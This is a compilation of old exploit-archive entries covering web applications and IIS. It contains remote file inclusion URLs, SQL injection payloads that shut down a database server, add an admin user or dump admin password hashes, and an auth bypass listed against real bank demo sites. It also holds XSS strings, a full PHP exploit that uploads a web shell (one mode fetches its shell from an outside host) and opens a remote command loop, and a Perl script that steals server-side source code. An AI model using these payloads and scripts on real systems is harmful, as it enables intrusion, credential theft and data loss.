http://localhost/[path]/lib/class/diff.php?GLOBALS[pie][library_path]=[evilcode]
http://localhost/[path]/libcompiler/html.php?GLOBALS[pie][library_path]=[evilcode]
http://localhost/[path]/lib/share/auth.php?GLOBALS[pie][library_path]=[evilcode]
===========================================================================================
[o] Greetz
MainHack BrotherHood [ http://serverisdown.org/blog/]
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
H312Y yooogy mousekill }^-^{ kaka11 martfella
skulmatic olibekas ulga Cungkee k1tk4t str0ke
GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]
===========================================================================================
Pie Web M{a,e}sher version 0.5.3 suffers from multiple remote file inclusion vulnerabilities.
tracewar/VP-ASP-SQL.txt ( na)
************************************************** !!! WARNING !!! ***********************************************************
* FOR EDUCATIONAL PURPOSES ONLY! *
******************************************************************************************************************************
* Neither myself nor any of my Affiliates shall be liable for any direct, incidental, consequential, indirect *
* or punitive damages arising out of access to, inability to access, or any use of the content of this advisory, *
* including without limitation any PC, other equipment or other property, even if I am Expressly advised of *
* the possibility of such damages. I DO NOT encourage criminal activities. If you use this advisory or commit *
* criminal acts with it, then you are solely responsible for your own actions and by use, downloading,transferring, *
* and/or reading anything from this advisory you are considered to have accepted the terms and conditions and have read *
* this disclaimer. Once again this advisory is for educational purposes only. *
******************************************************************************************************************************
* PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE *
VP-ASP x.x.x shopmaillist.asp SQL Injection (TESTED ON 5.xx/6.00>?) discovered by tracewar(tracewar@gmail.com).
the SQL injection exists in the UpdateCustomer procedure:
Sub UpdateCustomer
if getconfig("xMYSQL")="Yes" then
MYSQLMaillistUpdateCustomer
exit sub
end if
dim dbc, whereok
dim doupdate, templastname
OpenCustomerDb dbc
Set objRS = Server.CreateObject("ADODB.Recordset")
templastname=replace(strlastname,"'","''")
SQL = "SELECT * FROM " & dbtable & " WHERE "
whereok=""
sql=sql & whereok & " LastName='" & TempLastName & "'"
whereok = " AND "
SQL = SQL & whereok & " email='" & stremail & "'"
objRS.open SQL, dbc, adOpenKeyset, adLockOptimistic, adcmdText
'debugwrite sql
if not ObjRS.eof then
DoUpdate="True"
else
objRs.close
set objRS=nothing
end if
If Doupdate="" then
Set objRS = Server.CreateObject("ADODB.Recordset")
objRS.open dbtable, dbc, adOpenKeyset, adLockOptimistic, adCmdTable
objRS.AddNew
end if
Updateminimuminfo objrs
CloseRecordset objRS
ShopCloseDatabase dbc
end sub
If you keep tracking the code you will notice the "stremail" query isn't checked properly for SQL injections:
Else
ValidateData()
if sError = "" Then
If unsubscribe="" then
UpdateCustomer
SendMailToMerchant LangMailListRegistration
WriteInfo
the ValidateData() procedure is totally useless:
Sub ValidateData
strFirstname = Request.Form("strFirstname")
strLastname = Request.Form("strLastname")
strEmail = Request.Form("strEmail")
unsubscribe=request("blnmaillist")
ValidateMininumInfo
End Sub
Sub ValidateMininumInfo
BlnMailList=TRUE
If strLastname = "" Then
sError = sError & LangCustLastname & LangCustRequired & "<br>"
End If
If strEmail = "" Then
sError = sError & LangCustEmail & LangCustRequired & "<br>"
Else
CustomerValidateEmail stremail
end If
end sub
Sub CustomerValidateEmail (stremail)
If Not InStr(strEmail, "@") > 1 Then
Serror=Serror & LangInvalidEmail & "<br>"
end if
End sub
the query must contain @ as a first character in order to pass the CustomerValidateEmail useless procedure.
oh and this is also the reason why sql injection scanners didn't detect this injection earlier(HMPF HMPF *TIP* :P)
quick hack:
write this as email: JUNK@';shutdown--
in order to shutdown the sql server.
write this as email: asdsadd@asdd.com';insert into tbluser ('fldusername','fldpassword','fldaccess') values ('a','a')--
in order to add user 'a' with password 'a'.
THE END.
* PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE * PRIVATE *
VP-ASP suffers from a SQL injection vulnerability. Details provided.
Janek Vind aka waraxe/waraxe-2004-SA006.txt ( na)
{================================================================================}
{ [waraxe-2004-SA#006] }
{================================================================================}
{ }
{ [ Multiple vulnerabilities in 4nalbum module for PhpNuke ] }
{ }
{================================================================================}
Author: Janek Vind "waraxe"
Date: 15. March 2004
Location: Estonia, Tartu
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From developer's infofile:
4nAlbum Version 0.92 (German & English) for phpNUKE Version 6.5 - 7.0 (http://phpnuke.org)
By WarpSpeed (Marco Wiesler) (warpspeed@4thDimension.de) @ Nov/2oo3 http://www.warp-speed.de
@ 4thDimension.de Networking
With this addon/module for phpNUKE you can offer a comfortable
(Media) Album to your users.
- Creating infinite categories and subcategories
- Comfortable Administrationsfunction with helptexts
- Upload from Mediafiles for Members/Guests possible (can be deactivated)
- etc
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Full path disclosure:
If we use URL-s below, then we can see standard php error messages with full path disclosure.
This is frequently underestimated security flaw, which can give for potential attacker vital
information, needed to hack further. For example, if we can exploit some sql injection bugs and
logged-in MySql user has file permissions, then the exact full path to the file is needed to successful
file creation or reading.
Examples:
http://localhost/nuke71/modules/4nalbum/public/displaycategory.php
2. Remote file inclusion:
Remote attacker can make GET or POST request with specially crafted parameter and victim server
will include the file from remote server, therefore attacker can make victim server parse any php code,
whatever attacker wants. Of course - if webserver is located behind properly configured firewall, or if
php.ini configuration contains "allow_url_fopen = Off", then it does'nt work...
Examples:
First upload file named "fileFunctions.php" to te www.attacker.com. Then make request:
http://localhost/nuke71/modules/4nalbum/public/displaycategory.php?basepath=http://www.attacker.com/
This is the original code from displaycategory.php:
...
include ("$basepath/public/imageFunctions.php");
include ("$adminpath/fileFunctions.php");
function getThumbnail($img, $galloc) {
global
...
3. Cross-Site scripting aka XSS
XSS is useful for stealing of the cookies, which will lead to bypassing of the authentication and
overtaking of the website (if attacker can get admin-s cookies).
Example:
http://localhost/nuke71/modules/4nalbum/public/nmimage.php?z=[xss code here]
Because PhpNuke will filter some important symbols from GET request, POST request is needed.
4. sql injection
This is my favourite ;) - easy to exploit and the effect is devastating.
Try this:
http://localhost/nuke71/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-99%20UNION%20SELECT%20null,null,pwd,2,null,null,null%20FROM%20nuke_authors/*
and this:
http://localhost/nuke71/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-99%20UNION%20SELECT%20null,null,aid,2,null,null,null%20FROM%20nuke_authors/*
and you will see admin's password md5 hash and username. This is enough to handcraft the cookie and bypass authentication ;)
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to ulljobu, djzone, raider and to all IT freaks in Estonia!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.com
Janek Vind "waraxe"
---------------------------------- [ EOF ] ------------------------------------
The 4nalbum module for PHP-Nuke versions 6.5 to 7.0 suffers from path disclosure, cross site scripting, remote file inclusion, and SQL injection vulnerabilities.
The UnKn0wN/Koprana CMS Shell Upload ( na)
<?php
//NOTE : - If you are using BHR put this file in \exploits\webapp folder
// - BHR Download link => http://www.mediafire.com/?ij9rfpfw6s7uzxf (for windows only)
/*
load exploits/webapp/koprana_upload.php
set HOST target
set PORT Taget_PORT (default : 80)
set MODE (1 for backdoor upload/2 for shell upload)
set FILE (save format TXT/SQL)
exploit
!koprana_upload
@ HOST = localhost = Target URL
@ PORT = 80 = Target Port
@ PATH = / = Web site path
@ MODE = 1 = Exploit Mode
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $port,$packet)
{
if (!($sock = fsockopen($host, $port)))
die("\n[-] No response from {$host}:{$port}\n");
fputs($sock, $packet);
return stream_get_contents($sock);
}
print "\n+-----------------------[ The Crazy3D Team ]--------------------------+";
print "\n| Koprana CMS Remote Upload Exploit |";
print "\n| by The UnKn0wN |";
print "\n| Greets to : The Crazy3D members and all Algerian h4x0rs |";
print "\n+---------------------------------------------------------------------+";
print "\n| www.Dofus-Exploit.com | WwW.IzzI-Hack.com |";
print "\n+---------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] <host> <path> <mode>\n";
print "\nExample....: php $argv[0] localhost / 1";
print "\nExample....: php $argv[0] localhost /site/ 2\n";
die();
}
$host = $argv[1];
$port = $argv[2];
$path = $argv[3];
$mode = $argv[4];
$shell = "<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>";
$shell2 = file_get_contents("http://dofus-exploit.com/exploit/ibiza.txt"); //username : UnKnOwN password : lolilol (You can modify this by your own shell)
if($mode == "2") $shell = $shell2;
$boundary = "---------".str_replace(".", "", microtime());
$payload = "--{$boundary}\r\n";
$payload .= "Content-Disposition: form-data; name=\"fichier\"; filename=\"sh.php\"\r\n";
$payload .= "Content-Type: application/x-php\r\n\r\n";
$payload .= "".$shell."\n\r\n";
$payload .= "--{$boundary}\r\n";
$payload .= "Content-Disposition: form-data; name=\"execute\"\r\n\r\nexecute\r\n";
$payload .= "--{$boundary}\r\n";
$payload .= "Content-Disposition: form-data; name=\"dossier\"\r\n\r\n./\r\n";
$payload .= "--{$boundary}--\r\n";
$packet = "POST {$path}index.php?pages=buy1_ontrue HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Type: multipart/form-data; boundary={$boundary}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: keep-alive\r\n\r\n{$payload}";
http_send($host,$port, $packet);
if($mode == "1") {
$packet = "GET {$path}sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
if (!($sock = http_send($host,$port, $packet))) die("\n[-] Upload failed!\n");
print "[+]Backdoor was upload!\n[+]Getting the shell...\n";
while(1)
{
print "\nBHR@{$host}# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
preg_match("/_code_(.*)/s", http_send($host,$port, sprintf($packet, base64_encode($cmd))), $m) ?
print $m[1] : die("\n[-] Exploit failed!\n");
}
}else
print "Go to {$host}{$path}sh.php to check.\n";
?>
Koprana CMS remote shell upload exploit written in PHP.
Chokri Ben Achor/BeneficialBank Business 4.13.1 SQL Injection ( na)
Title:
======
BeneficialBank Business v4.13.1 - Auth Bypass Vulnerability
Date:
=====
2012-07-09
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=654
VL-ID:
=====
654
Common Vulnerability Scoring System:
====================================
8.5
Abstract:
=========
A Vulnerability-Lab researcher discovered an SQL injection vulnerability in the Beneficial Bank Business Banking v4.13.1 CMS.
Report-Timeline:
================
2012-07-09: Public or Non-Public Disclosure
Status:
========
Published
Exploitation-Technique:
=======================
Remote
Severity:
=========
Critical
Details:
========
A Auth Bypass vulnerability is detected in the Beneficial Bank Business Banking 4.13.1 Content Management System.
Remote attackers without privileged user accounts can execute/inject own sql commands to compromise the application dbms.
The vulnerability is located in the login module with the bound vulnerable Company ID & Company Password parameters.
Successful exploitation of the vulnerability result in dbms (Server) or application (Web) compromise & unauthorized
web application (admin/customer) panel access.
Vulnerable Section(s):
[+] Login
Vulnerable Parameter(s):
[+] User & Pass
Proof of Concept:
=================
The login auth bypass vulnerability can be exploited by remote attacker without privileged user account. For demonstration or reproduce ...
PoC:
user : ' or 1=1--
pass : ' or 1=1--
URL:
http://www.thebeneficial-ebanking.com/customer_demo/index2.html
https://www.frontrangebankonline.com/customer_demo/index2.html
http://www.libertybaybank.com/customer_demo/index2.html
http://www.fs-bankonline.com/customer_demo/index2.html
http://www.centralstateonline.com/customer_demo/index2.html
http://www.hvbonlinebanking.com/customer_demo/index2.html
Risk:
=====
The security risk of the auth bypass vulnerability is estimated as critical.
Credits:
========
Vulnerability Research Laboratory - Chokri Ben Achor (meister@vulnerability-lab.com)
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.
Copyright © 2012 | Vulnerability Laboratory
--
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research@vulnerability-lab.com
BeneficialBank Business version 4.13.1 suffers from a remote SQL injection vulnerability.
YEnH4ckEr/my-colex 1.4.2 (AB/XSS/SQL) Multiple Remote Vulnerabilities ( php)
***********************************************************************************************
***********************************************************************************************
** **
** **
** [] [] [] [][][][> [] [] [][ ][] [] [][]] [] [> [][][][> [][][][] **
** || || || [] [][] [] [] [] [] [] [] [] [] [] [] **
** [> [][][][] [][][][> [] [] [] [] [] [][] [] [][] [][][][> [] [] **
** [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\
**==[> [] [] [] [][] [] [] [][][] [] [][] [] [] [] >>--
** [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/
[> [[[]]] [][][][> [][] [] [][[] [[]] [][] [][][] [] [> [][][][> <][] [] **
** **
** **
** ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O **
** ¡PROUD TO BE SPANISH! **
** **
***********************************************************************************************
***********************************************************************************************
----------------------------------------------------------------------------------------------
| MULTIPLE REMOTE VULNERABILITIES |
|--------------------------------------------------------------------------------------------|
| | my-colex 1.4.2 | |
| CMS INFORMATION: ------------------------------ |
| |
|-->WEB: http://www.collector.ch/drupal5/index.php |
|-->DOWNLOAD: http://www.collector.ch/drupal5/?q=node/11 |
|-->DEMO: http://www.collector.ch/drupal5/?q=node/10 |
|-->CATEGORY: Management |
|-->DESCRIPTION: myColex is a complete museum management and collection documentation |
| system with longterm archiving capabilities based on Apache/PHP and mySQL... |
|-->RELEASED: 2009-03-24 |
| |
| CMS VULNERABILITY: |
| |
|-->TESTED ON: firefox 3 |
|-->DORK: N/A |
|-->CATEGORY: AUTH BYPASS/ SQL INJECTION / XSS |
|-->AFFECT VERSION: 1.4.2 (maybe <= ?) |
|-->Discovered Bug date: 2009-05-06 |
|-->Reported Bug date: 2009-05-06 |
|-->Fixed bug date: 2009-05-07 |
|-->Info patch: http://www.collector.ch/drupal5/?q=forum/15 |
|-->Author: YEnH4ckEr |
|-->mail: y3nh4ck3r[at]gmail[dot]com |
|-->WEB/BLOG: N/A |
|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. |
|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) |
----------------------------------------------------------------------------------------------
#################
/////////////////
INTRODUCTION:
/////////////////
#################
This app is completely vulnerable to sql code injection.
Except auth bypass we can not exploit sql injection without a register user.
#########################
////////////////////////
AUTH BYPASS (SQLi):
////////////////////////
#########################
<<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>>
----------
EXPLOIT:
----------
Name=' or 1=1#
password=123456 (over six characters)
Then, going to http://[HOST]/[HOME_PATH]/modules/admuser.php?Modus=Find
We got admin credentials...
Password is encrypted with MySQLSHA-1.
#########################
////////////////////////
SQL INJECTION (SQLi):
////////////////////////
#########################
<<<<---------++++++++++++++ Condition: Be a register user +++++++++++++++++--------->>>>
<<<<---------++++++++++++++ Condition: magic quotes = ON/OFF +++++++++++++++++--------->>>>
------------------
PROOF OF CONCEPT:
------------------
Some examples:
http://[HOST]/[HOME_PATH]/modules/kategorie.php?Modus=Detail&ID=1+and+0+union+all+select+1,version(),database(),user(),version()%23
http://[HOST]/[HOME_PATH]/modules/medium.php?Modus=Detail&ID=23+and+0+UNION+ALL+SELECT+1,version(),database(),version(),user(),database(),7/*
http://[HOST]/[HOME_PATH]/modules/person.php?Modus=Detail&ID=2+AND+0+UNION+ALL+SELECT+1,2,3,4,version(),6,user(),version(),database(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36/*
http://[HOST]/[HOME_PATH]/modules/schlagwort.php?Modus=Detail&ID=1+AND+0+UNION+ALL+SELECT+1,version(),database(),current_user(),user(),6/*
There are more...
Return: user, version, ...
----------
EXPLOITS:
----------
http://[HOST]/[HOME_PATH]/modules/kategorie.php?Modus=Detail&ID=1+and+0+union+all+select+1,SuUser,SuEmail,SuPwd,SuSysAut+FROM+sysuser+WHERE+SuID=1%23
http://[HOST]/[HOME_PATH]/modules/medium.php?Modus=Detail&ID=23+and+0+UNION+ALL+SELECT+1,2,3,4,SuUser,SuPwd,6+FROM+sysuser+WHERE+SuID=1/*
Return: username/password (id=1)
###########################
///////////////////////////
CROSS SITE SCRIPTING (XSS):
///////////////////////////
###########################
XSS is possible where you like :P
Some examples:
http://[HOST]/[HOME_PATH]/modules/kalender.php?month=5&year=2009"><script>alert('y3nh4ck3r+was+here!')</script>
http://[HOST]/[HOME_PATH]/modules/ereignis.php?Modus=List&Page=1"><script>alert('y3nh4ck3r+was+here!')</script>&Order=ErAnfangsdatum
http://[HOST]/[HOME_PATH]/modules/kategorie.php?Modus=Search&Kontext=objekt"><script>alert('y3nh4ck3r+was+here!')</script>
http://[HOST]/[HOME_PATH]/modules/image.php?image=<script>alert('y3nh4ck3r+was+here!')</script>
Of course there are more...
<<<-----------------------------EOF---------------------------------->>>ENJOY IT!
#######################################################################
#######################################################################
##*******************************************************************##
## SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)! ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
## GREETZ TO: JosS, Ulises2k, J.McCray and Spanish Hack3Rs community!##
##*******************************************************************##
#######################################################################
#######################################################################
# milw0rm.com [2009-05-15]
Smiler/srcgrab.pl.txt ( na)
Subject: Re: Translate:f summary, history and thoughts > Simple perl script
exploit for the problem.
Please find a simple perl script included at the bottom that exploits below described problem.
> ----- Original Message -----
> From: "Daniel Doèekal" <ddoc@MIA.CZ>
> To: <BUGTRAQ@SECURITYFOCUS.COM>
> Sent: Tuesday, August 15, 2000 7:39 PM
> Subject: Translate:f summary, history and thoughts
>
>
> > Because Microsoft went the way of HIDING the actual mechanism of
> Translate:f
> > from all of us (original KB article is gone and new Security Bulletin is
> > playing nasty game of downplaying the problem), i have decided to write
> > follow up with sufficient information.
> >
> > HOW IT WORKS
> > -------------------------
> >
> > WebDAV implemented in Windows 2000 and Office 2000 (including FrontPage
> 2000
> > and FrontPage 2000 Server extensions) is the source of Translate:f
> problem.
> >
> > When someone makes request for ASP/ASA (or any other scriptable page)
and
> > adds "Translate: f" into headers of HTTP GET request (headers are _not_
> part
> > of URL, they are part of HTTP request), there is a serious security bug
in
> > Windows 2000 (unpatched by SP1) that in return gives complete ASP/ASA
code
> > instead of processed file (one has to add trailing slash "/" to end of
> > requested url to have this really working).
> >
> > "Translate: f" is legitimate header for WebDAV, it is used as it should
> be -
> > adding this to HTTP GET is sign for WebDAV component to really return
> SOURCE
> > code of file and bypass processing. It is used in FrontPage2000 and any
> > WebDAV compatible client to get file for editing. It has to be
accompanied
> > by some other information which should not let anynone access sources.
> > Unfortunately, there is some mistake in coding, and simple adding of
> "only"
> > "Translate:f" and placing "/" at end of request to HTTP GET will lead in
> > security bug (which now plagues every second web tested in URLcheck test
> at
> > security.namodro.cz).
> >
> > It is WINDOWS 2000 bug, but because of FrontPage Server Extensions 2000
> > installed even on IIS 4.0 sites, it is also IIS 4.0 bug. Also worth of
> note
> > is that MANY IIS 4.0 sites will exhibit "Translate: f" bug when web
files
> > are stored on SHARED (network) directory - this has been reported to
> > secure@microsoft.com the same time i started bombing them with
information
> > that there is BIG problem with "Translate: f" - and result of case at
> > secure@microsoft.com :
> >
> > YES, IIS 4.0 is vulnerable, if files are located on shared drive - in
that
> > case, please apply fix for "Virtualized UNC Share" vulnerability (please
> see
> > MS00-019 for fixes). So even IIS 4.0 is _not_ safe from this problem.
> >
> > THE HISTORY
> > ---------------------
> >
> > "Translate: f" bug was first made public around 5th of June 2000, at
that
> > time MS KB article Q256888 was released and was fully describing the
> > mechanism. At 6th of June, there was a POSTFIX released as standalone
EXE
> > fixing the problem.
> >
> > At that point someone at Microsoft made big mistake, instead of
releasing
> > Security Bulletin and instead of notifying PREMIER SUPPORT customers,
they
> > just left this only with one Q256888 article. And it appears that most
> > IIS4/IIS5 admins are just NOT checking Knowledge Base (we do, and Svet
> > Namodro has released its own priority warning and we have patched our
> > servers immediately).
> >
> > Then Service Pack 1 for Windows 2000 was released - the bug IS fixed by
> > applying SP1 - but it is obvious, that nobody is in big hurry to apply
> SP1.
> > Result is - many well know web sites are having security problem and
> showing
> > business logic including passwords to databases.
> >
> > After sending many, many, mails to Microsoft (including
> > secure@microsoft.com, Mr. Ballmer office, passing letter through support
> at
> > Czech Microsoft), there is result - it took TWO weeks to have new
Security
> > Bulletin out. And i have to say, that i am very disappointed. Microsoft
is
> > now HIDING the "Translate:f" nature from all of us (KB Q256888 was
pulled
> > from Knowledge Base) and Security Bulletin is downplaying the level of
> > problem we are dealing with.
> >
> > LINKS
> > ---------
> >
> > http://www.microsoft.com/technet/security/bulletin/ms00-058.asp
> > Security bulletin talking about "Translate:f" but hiding this fact from
> us,
> > inside you will find POSTFIX URL which is
> > http://www.microsoft.com/Downloads/Release.asp?ReleaseID=23769
> >
> >
>
http://support.microsoft.com/support/kb/articles/q256/8/88.ASP?LN=EN-US&SD=g
> > n&FR=0
> > Q256888 (now inaccessible) where original version was clearly talking
> about
> > "Translate:f" (curious how it will look when it is "rewritten").
> >
> >
>
http://download.microsoft.com/download/win2000srv/Patch/Q262259/NT5/EN-US/Q2
> > 62259_W2K_SP1_X86_EN.EXE
> > original US ENGLISH hotfix from 6th of June
> >
> > http://support.microsoft.com/support/kb/articles/q262/2/59.ASP
> > another KB article showing link to Q256888 as :
> > "Internet Information Service Returns Source of Active Server Pages File
> > When Request Contains Translate:f and Ends with a Backslash" - maybe
save
> it
> > for your kids to see how Microsoft changes history!
> >
> > http://security.namodro.cz/urlcheck.asp?lang=en
> > English version of pages letting anyone to verify if his/her server is
not
> > vulnerable to Translate:f (and some other similar "url" related bugs).
> >
> > THOUGHTS
> > -----------------
> >
> > Most important and dangerous aspect of bugs leading to source of ASP/ASA
> is
> > not in giving away your business logic. It is not worth of trying to
> > download all ASP/ASA files and decode how something works. Most
important
> > aspect is in showing PASSWORDS to access SQL Server Databases and
> LOCATIONS
> > of Access databases. This is how sites are hacked and private sensitive
> data
> > are falling in hands of strangers.
> >
> > Even after YEARS of existence of ASP files, Microsoft did nothing to
> remove
> > one from most dangerous aspect - that ASP/ASA files are used for storing
> > passwords and sensitive information.
> >
> > Daniel
> >
>
>
___________________cut here___________________________
#!/usr/bin/perl
# Expl0it By smiler@vxd.org
# Tested with sucess against IIS 5.0. Maybe it works against IIS 4.0 using a shared drive but I haven´t tested it yet.
# Get the source code of any script from the server using this exploit.
# This code was written after Daniel Docekal brought this issue in BugTraq.
# Cheers 351 and FractalG :)
if (not $ARGV[0]) {
print qq~
Geee it´s running !! kewl :)))
Usage : srcgrab.pl <complete url of file to retrieve>
Example Usage : srcgrab.pl http://www.victimsite.com/global.asa
U can also save the retrieved file using : srcgrab.pl http://www.victim.com/default.asp > file_to_save
~; exit;}
$victimurl=$ARGV[0];
# Create a user agent object
use LWP::UserAgent;
$ua = new LWP::UserAgent;
# Create a request
my $req = new HTTP::Request GET => $victimurl . '\\'; # Here is the backslash at the end of the url ;)
$req->content_type('application/x-www-form-urlencoded');
$req->content_type('text/html');
$req->header(Translate => 'f'); # Here is the famous translate header :))
$req->content('match=www&errors=0');
# Pass request to the user agent and get a response back
my $res = $ua->request($req);
# Check the outcome of the response
if ($res->is_success) {
print $res->content;
} else {
print $res->error_as_HTML;
}
Srcgrab.pl exploits the Translate:f bug as described in ms00-058. The vulnerability, present in IIS 4.0 and Windows 2000 Frontpage server extensions, allows a remote user to retrieve the source of .asa and .asp pages.